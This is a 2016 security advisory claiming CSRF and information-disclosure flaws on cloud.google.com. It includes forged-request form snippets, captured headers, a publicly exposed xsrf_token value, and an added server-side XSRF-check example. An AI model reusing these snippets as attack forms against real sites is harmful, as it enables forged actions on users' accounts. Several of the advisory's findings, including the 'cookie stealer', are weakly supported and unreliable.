Google Cloud cloud.google.com CSRF/XSRF

Published: 2016.02.16
Credit: Ashiyane Digital Security Team
Risk: Medium
CWE: CWE-352
CVE: N/A
Local: No
Remote: Yes

/************************************************************************************************
[+] Title : Google Cloud CSRF/XSRF

[+] Exploit Author : Ashiyane Digital Security Team

[+] Tested on : Windows - Firefox

[+] Vendor Homepage : http://cloud.google.com

[+] Date : 16 Feb. 2016

*************************************************************************************************/
------------------------------------------------------
Method GET in CSRF Exploitation:
------------------------------------------------------

In a Cross Site Request Forgery (CSRF or XSRF) attack, a malicious site gets an
unsuspecting user to make a hidden HTTP request back to a legitimate site, forcing
an unintentional action. To prevent such attacks, you need to verify that an
incoming HTTP request came from an authenticated user under normal circumstances.

Over HTTP GET the forged request can be delivered through a simple hyperlink
containing manipulated parameters, or through an IMG tag that the browser loads
automatically. By the HTTP specification, however, GET should be a safe method,
that is, one that does not significantly change the user's state in the
application or website.


--------------------------------------------------------------
Snippet from the index page for a test TEXT query:
-------------------------------------------------------------

<form action="https://cloud.google.com/s/results" name="Ashexpl" enctype="multipart/form-data" method="get">
  <div id="searchbox" class="devsite-searchbox">
    <input type="text" placeholder="Put TEXT Here" class="devsite-search-query" name="q" autocomplete="off">
  </div>
  <button id="search-button" class="button button-blue big">
    <img src="https://cloud.google.com/_static/8ceb0d7f64/images/v2/search.png" href="javascript:void(0)" alt="Search">
  </button>
  <input type="hidden" name="p" id="search_project" value="" data-project-name="Cloud Platform" data-project-path="" data-query-match=""/>
  <input type="hidden" id="suggest-category-label-2" value="Pages in Cloud Platform" />
  <input type="hidden" id="suggest-category-label-3" value="Reference in Cloud Platform" />
  <input type="hidden" id="suggest-category-label-1" value="Products" />
  <input type="hidden" id="suggest-all-results-label" value="See all results for" />
</form>


%%%---------------------------------------------------------------------------------------------------%%%
# The snippet carries no security token, not even a captcha image.
%%%----------------------------------------------------------------------------------------------------%%%


-----------------------------------------------------------------------------
Request monitored with the Live HTTP Headers add-on:
----------------------------------------------------------------------------

Host: cloud.google.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://cloud.google.com/s/results?q=Put TEXT Here

Connection: keep-alive


-----------------------------------------------------------------------------------------
Warning: GET Request (Information Disclosure Vulnerability):
-----------------------------------------------------------------------------------------

Description:

The vulnerability can be exploited by remote attackers without any privileges on
the Cloud system; a plain GET request returns the Cloud detail.


Vulnerability : https://cloud.google.com/_s/getsuggestions?hl=en&s=cloud&c=1



///--------------------------------------------------------------------------------------------------------------------------------------///


-------------------------------
XSRF Exploitation:
-------------------------------

This restriction (the browser's same-origin policy on cookies) means that the
malicious domain will not be able to echo cookie values in any sort of
programmatic way, such as injecting them as an HTTP header. When you make
requests using the $http service (or anything built on top of $http, like
$resource), AngularJS will look for the existence of the "XSRF-TOKEN" cookie.
If it finds it, it will append the cookie value as the outgoing HTTP header
"X-XSRF-TOKEN". This means that when you set the XSRF token cookie, AngularJS
will send two tokens with each HTTP AJAX request:

[+] The cookie, XSRF-TOKEN.
[+] The header, X-XSRF-TOKEN.
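The server-side half of that mechanism, as an added example that is not part of the advisory: a forged request from another origin (the hyperlink or IMG-tag GET, or a cross-site form POST described above) can carry the XSRF-TOKEN cookie but cannot add the custom header, so the server rejects anything state-changing where the two are absent or differ. The function names (checkXsrf, parseCookies, timingSafeEqual), the request objects and the token values are constructed for this example.

```javascript
// Added example, not from the advisory: server-side check for the AngularJS
// double-submit pattern (XSRF-TOKEN cookie must match the X-XSRF-TOKEN header).

// Safe methods must not change state, so they are not required to carry a token.
const SAFE_METHODS = ["GET", "HEAD", "OPTIONS"];

// Constant-time string comparison so a mismatch does not leak via timing.
function timingSafeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string") return false;
  let diff = a.length ^ b.length;
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    diff |= (a.charCodeAt(i) || 0) ^ (b.charCodeAt(i) || 0);
  }
  return diff === 0;
}

// Parse a raw Cookie request header ("a=1; b=2") into a plain object.
function parseCookies(header) {
  const jar = {};
  for (const part of (header || "").split(";")) {
    const eq = part.indexOf("=");
    if (eq > 0) jar[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return jar;
}

// req = { method, headers } with lower-case header names (as Node's http module
// delivers them). Returns { ok, reason } so a handler can log why it refused.
function checkXsrf(req) {
  if (SAFE_METHODS.includes(req.method)) return { ok: true, reason: "safe method" };
  const cookieToken = parseCookies(req.headers["cookie"])["XSRF-TOKEN"];
  const headerToken = req.headers["x-xsrf-token"];
  if (!cookieToken) return { ok: false, reason: "no XSRF-TOKEN cookie" };
  // A form or IMG tag on a foreign origin sends the cookie automatically but
  // cannot set a custom header, so a missing header marks a forged request.
  if (!headerToken) return { ok: false, reason: "no X-XSRF-TOKEN header" };
  if (!timingSafeEqual(cookieToken, headerToken)) return { ok: false, reason: "token mismatch" };
  return { ok: true, reason: "cookie and header match" };
}

// Constructed sample requests; the cookie and token values are made up.
const angularRequest = { method: "POST", headers: {
  cookie: "NID=example; XSRF-TOKEN=t0k3n-abc", "x-xsrf-token": "t0k3n-abc" } };
const forgedFormPost = { method: "POST", headers: { cookie: "NID=example; XSRF-TOKEN=t0k3n-abc" } };
const searchGet = { method: "GET", headers: { cookie: "NID=example" } };

console.log(checkXsrf(angularRequest).ok, checkXsrf(forgedFormPost).ok, checkXsrf(searchGet).ok);
// prints "true false true"
```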

--------------------------------------------
XSRF Token in GET request:
--------------------------------------------

https://tools.digitalpoint.com/cookie-search?action=cloud.google.com

Among the cookies seen on Google subdomains in the last 24 hours is the XSRF-TOKEN
cookie, which can be viewed in the Firefox browser with:

view-source:https://cloud.google.com/


-------------------------------------------------------
XSRF Exploitation & Cookie Stealer:
-------------------------------------------------------
Description:

This form carries an xsrf_token value that is visible to any visitor, so it could
be stolen and submitted along with your data. Snippet code:

<form action="https://cloud.google.com/i18n/setlang/" method="post">
  <input type="hidden" name="xsrf_token" value="kkLdJ1sQCXWmd7KAKiKNgAfVJhGqDVU-OXlcyiwb2wk6MTQ1NTIxNTEwMjkwOTI5MA" />
  <select name="language" onchange="this.form.submit(); return false;">
    <option value="en" selected>English</option>
    <option value="ja">日本語</option>
  </select>
</form>

///-----------------------------------------------------------------------///

/--------------------------------------------------
Discovered By Und3rgr0und
-------------------------------------------------/


Copyright 2017, cxsecurity.com